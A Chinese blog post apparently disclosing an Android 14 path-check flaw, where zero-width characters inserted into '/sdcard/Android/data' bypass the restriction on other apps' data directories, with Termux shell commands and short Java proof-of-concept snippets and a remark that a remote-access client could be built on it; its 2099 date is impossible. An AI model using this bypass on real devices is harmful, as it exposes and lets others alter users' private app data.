侧边栏壁纸
博主头像
hujiayucc

学了这么久面向对象却没有对象,后来以为是因为缺少了过程,等学完面向过程早已经物人非,有没有过程并不重要,是你的终归是你的

  • 累计撰写 12 篇文章
  • 累计收到 7 条评论

Android操作系统对Android/data访问路径判断存在逻辑缺陷

2099-5-22 / 0 评论 / 1013 阅读

漏洞环境及工具

  • Android OS 14
  • Termux 任意版本

复现过程


确定 Termux 有访问文件的权限,如果没有就执行以上命令

ls /sdcard/Android/data

执行以上代码,可以看到没有访问权限

ls /sdcard/Android$'\u200d'/data

但是在路径中加入\u200d,可以绕过路径判断

经测试,可以对Android/data目录下的所有文件进行任意操作

其他Poc

File dir = new File("/sdcard/Android\u200d/data");
File[] files = dir.listFiles();
for (File file : files) {
    System.out.println(file);
}
File dir = new File("/sdcard/\u200bAndroid/data");
File[] files = dir.listFiles();
for (File file : files) {
    System.out.println(file);
}

附加说明

除了/sdcard/Android$'\u200d'/data以外,还可以通过/sdcard/$'\u200b'Android/data进行越权操作

演示视频:点击查看
通过以上测试,可以制作一个客户端实现远程访问和修改

评论一下?

OωO
取消